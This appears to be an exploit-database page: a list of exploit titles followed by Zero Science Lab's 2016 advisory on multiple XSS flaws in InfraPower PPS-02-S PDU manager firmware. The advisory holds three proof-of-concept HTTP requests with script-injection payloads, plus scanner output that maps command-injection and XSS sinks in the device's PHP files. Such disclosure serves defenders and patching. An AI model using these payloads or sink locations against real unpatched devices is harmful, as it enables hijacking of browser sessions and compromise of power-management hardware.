3b565e4e9d
7 new exploits SetCMS 3.6.5 - (setcms.org) Remote Command Execution SetCMS 3.6.5 - Remote Command Execution PHP-Nuke < 8.0 - 'sid' SQL Injection PHP-Nuke 8.0 Final - 'sid' SQL Injection PHP-Nuke < 8.0 - 'sid' Parameter SQL Injection PHP-Nuke 8.0 Final - 'sid' Parameter SQL Injection Foojan Wms 1.0 - (index.php story) SQL Injection Foojan Wms 1.0 - 'story' Parameter SQL Injection Web Wiz Forums 9.07 - (sub) Directory Traversal Web Wiz Forums 9.07 - 'sub' Parameter Directory Traversal Web Wiz NewsPad 1.02 - (sub) Directory Traversal Siteman 1.1.9 - (cat) Remote File Disclosure Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution SLAED CMS 2.5 Lite - (newlang) Local File Inclusion Liquid-Silver CMS 0.1 - (update) Local File Inclusion Web Wiz NewsPad 1.02 - 'sub' Parameter Directory Traversal Siteman 1.1.9 - 'cat' Parameter Remote File Disclosure Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution SLAED CMS 2.5 Lite - 'newlang' Parameter Local File Inclusion Liquid-Silver CMS 0.1 - 'update' Parameter Local File Inclusion Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC) Seagull 0.6.3 - 'files' Parameter Remote File Disclosure ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC) flinx 1.3 - (category.php id) SQL Injection flinx 1.3 - 'id' Parameter SQL Injection Persits XUpload 3.0 - AddFile() Remote Buffer Overflow Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow simple forum 3.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities Simple Forum 3.2 - File Disclosure / Cross-Site Scripting WordPress Plugin WP-Cal 0.3 - editevent.php SQL Injection WordPress Plugin fGallery 2.4.1 - fimrss.php SQL Injection Oracle 10g R1 - pitrig_drop PLSQL Injection (get users hash) Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash) WordPress Plugin WP-Cal 0.3 - 'editevent.php' SQL Injection WordPress Plugin fGallery 2.4.1 - 'fimrss.php' SQL Injection Oracle 10g R1 - 'pitrig_drop' PLSQL Injection (get users hash) Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection (get users hash) phpMyClub 0.0.1 - (page_courante) Local File Inclusion bubbling library 1.32 - dispatcher.php Remote File Disclosure Bigware Shop 2.0 - pollid SQL Injection Smart Publisher 1.0.1 - (disp.php) Remote Code Execution SafeNet 'IPSecDrv.sys' 10.4.0.12 - Local kernel Ring0 SYSTEM Exploit phpMyClub 0.0.1 - 'page_courante' Parameter Local File Inclusion bubbling library 1.32 - 'uri' Parameter Remote File Disclosure Bigware Shop 2.0 - 'pollid' Parameter SQL Injection Smart Publisher 1.0.1 - 'filedata' Parameter Remote Code Execution SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM Exploit phpCMS 1.2.2 - (parser.php) Remote File Disclosure Mambo Component NewsLetter - (listid) SQL Injection Mambo Component Fq - (listid) SQL Injection Mambo Component MaMML - (listid) SQL Injection phpCMS 1.2.2 - 'file' Parameter Remote File Disclosure Mambo 4.5 'com_newsletter' - 'listid' Parameter SQL Injection Mambo 'com_fq' - 'listid' Parameter SQL Injection Mambo 'com_mamml' - 'listid' Parameter SQL Injection phpCMS 1.1.7 - counter.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - parser.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.parser_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - PHPCMS include/class.session_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.edit_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.http_indexer_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.cache_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.search_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.lib_indexer_universal_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - include/class.layout_PHPcms.php PHPCMS_INCLUDEPATH Parameter Remote File Inclusion phpCMS 1.1.7 - 'counter.php' Remote File Inclusion phpCMS 1.1.7 - 'parser.php' Remote File Inclusion phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.session_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.edit_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.http_indexer_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.cache_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.search_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.lib_indexer_universal_PHPcms.php' Remote File Inclusion phpCMS 1.1.7 - 'class.layout_PHPcms.php' Remote File Inclusion phpCMS 2008 - 'ask/search_ajax.php' SQL Injection phpCMS 2008 - 'search_ajax.php' SQL Injection InfraPower PPS-02-S Q213V1 - Local File Disclosure InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference InfraPower PPS-02-S Q213V1 - Authentication Bypass InfraPower PPS-02-S Q213V1 - Multiple XSS InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery InfraPower PPS-02-S Q213V1 - Hard-Coded Credentials InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution
235 lines
7.3 KiB
Text
Executable file
235 lines
7.3 KiB
Text
Executable file
InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities
|
|
|
|
|
|
Vendor: Austin Hughes Electronics Ltd.
|
|
Product web page: http://www.austin-hughes.com
|
|
Affected version: Q213V1 (Firmware: V2395S)
|
|
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
|
|
|
|
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
|
|
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
|
|
Patented IP Dongle provides IP remote access to the PDUs by a true
|
|
network IP address chain. Only 1xIP dongle allows access to max. 16
|
|
PDUs in daisy chain - which is a highly efficient cient application
|
|
for saving not only the IP remote accessories cost, but also the true
|
|
IP addresses required on the PDU management.
|
|
|
|
Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities
|
|
when input passed via several parameters to several scripts is not properly
|
|
sanitized before being returned to the user. This can be exploited to execute
|
|
arbitrary HTML and script code in a user's browser session in context of an affected
|
|
site.
|
|
|
|
Tested on: Linux 2.6.28 (armv5tel)
|
|
lighttpd/1.4.30-devel-1321
|
|
PHP/5.3.9
|
|
SQLite/3.7.10
|
|
|
|
|
|
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2016-5369
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php
|
|
|
|
|
|
27.09.2016
|
|
|
|
--
|
|
|
|
|
|
#################################################################################
|
|
|
|
GET /SensorDetails.php?Menu=SST&DeviceID=C100"><script>alert(1)</script> HTTP/1.1
|
|
|
|
#################################################################################
|
|
|
|
POST /FWUpgrade.php HTTP/1.1
|
|
Host: 192.168.0.17
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh
|
|
Connection: close
|
|
|
|
------WebKitFormBoundary207OhXVwesC60pdh
|
|
Content-Disposition: form-data; name="FW"; filename="somefile.php<img src=x onerror=confirm(2)>"
|
|
Content-Type: text/php
|
|
|
|
t00t
|
|
------WebKitFormBoundary207OhXVwesC60pdh
|
|
Content-Disposition: form-data; name="upfile"
|
|
|
|
somefile.php
|
|
------WebKitFormBoundary207OhXVwesC60pdh
|
|
Content-Disposition: form-data; name="ID_Page"
|
|
|
|
Firmware.php?Menu=FRM
|
|
------WebKitFormBoundary207OhXVwesC60pdh--
|
|
|
|
|
|
#################################################################################
|
|
|
|
POST /SNMP.php?Menu=SMP HTTP/1.1
|
|
Host: 192.168.0.17
|
|
|
|
SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)//
|
|
|
|
#################################################################################
|
|
|
|
|
|
lqwrm@zslab:~#
|
|
lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt
|
|
-------------------------------------------------
|
|
PHP Source Code Security Scanner v0.2
|
|
(c) Zero Science Lab - http://www.zeroscience.mk
|
|
Tue Sep 27 10:35:52 CEST 2016
|
|
-------------------------------------------------
|
|
|
|
Scanning recursively...Done.
|
|
|
|
dball.php:
|
|
|
|
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
|
|
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table'
|
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
|
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
|
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
|
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
|
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
|
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
|
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
|
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
|
|
|
|
|
|
doupgrate.php:
|
|
|
|
Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
|
|
Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
|
|
Line 15: Command Injection in 'system' via '$_POST'
|
|
Line 16: Command Injection in 'system' via '$_POST'
|
|
Line 19: Command Injection in 'system' via '$_POST'
|
|
|
|
|
|
Firmware.php:
|
|
|
|
Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
|
|
|
|
|
|
Function.php:
|
|
|
|
Line 257: Header Injection in 'header' via '$_SERVER'
|
|
Line 267: Header Injection in 'header' via '$_SERVER'
|
|
|
|
|
|
FWUpgrade.php:
|
|
|
|
Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
|
Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
|
Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
|
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
|
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
|
|
|
|
|
index.php:
|
|
|
|
Line 2: Header Injection in 'header' via '$_SERVER'
|
|
|
|
|
|
IPSettings.php:
|
|
|
|
Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
|
|
Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
|
|
Line 117: Command Injection in 'exec' via '$IP_setting'
|
|
Line 117: Command Injection in 'exec' via '$Netmask_setting'
|
|
Line 123: Command Injection in 'exec' via '$Gateway_setting'
|
|
|
|
|
|
ListFile.php:
|
|
|
|
Line 12: PHP File Inclusion in 'fgets' via '$fp'
|
|
|
|
|
|
Login.php:
|
|
|
|
Line 151: Command Injection in 'shell_exec' via '$_POST'
|
|
|
|
|
|
Ntp.php:
|
|
|
|
Line 46: Command Injection in 'exec' via '$idx'
|
|
|
|
|
|
OutletDetails.php:
|
|
|
|
Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
|
Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
|
Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
|
Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
|
Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row'
|
|
Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row'
|
|
Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
|
|
|
|
|
PDUStatus.php:
|
|
|
|
Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
|
|
|
|
|
|
production_test1.php:
|
|
|
|
Line 6: Command Injection in 'shell_exec' via '$_POST'
|
|
Line 45: Command Injection in 'proc_open' via '$_ENV'
|
|
|
|
|
|
SensorDetails.php:
|
|
|
|
Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
|
Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
|
Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
|
|
|
|
|
|
SensorStatus.php:
|
|
|
|
Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
|
|
|
|
|
|
SNMP.php:
|
|
|
|
Line 41: Command Injection in 'exec' via '$_POST'
|
|
|
|
|
|
System.php:
|
|
|
|
Line 54: Header Injection in 'header' via '$_SERVER'
|
|
Line 64: Header Injection in 'header' via '$_SERVER'
|
|
Line 99: Command Injection in 'exec' via '$datetime'
|
|
Line 99: Command Injection in 'exec' via '$datetime'
|
|
Line 99: Command Injection in 'exec' via '$datetime'
|
|
Line 99: Command Injection in 'exec' via '$datetime'
|
|
Line 99: Command Injection in 'exec' via '$datetime'
|
|
Line 99: Command Injection in 'exec' via '$datetime'
|
|
Line 185: Command Injection in 'exec' via '$TimeServer'
|
|
Line 286: Command Injection in 'exec' via '$IP_setting'
|
|
Line 286: Command Injection in 'exec' via '$Netmask_setting'
|
|
Line 292: Command Injection in 'exec' via '$Gateway_setting'
|
|
|
|
|
|
UploadEXE.php:
|
|
|
|
Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
|
Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
|
|
Line 82: Command Injection in 'popen' via '$_FILES'
|
|
Line 96: PHP File Inclusion in 'fgets' via '$fp'
|
|
Line 96: PHP File Inclusion in 'fgets' via '$buffer'
|
|
|
|
|
|
WriteRequest.php:
|
|
|
|
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
|
|
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
|
|
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
|
|
|
|
|
|
-----------------------------------------------------
|
|
Scan finished. Check results in scan_output.txt file.
|
|
|
|
lqwrm@zslab:~#
|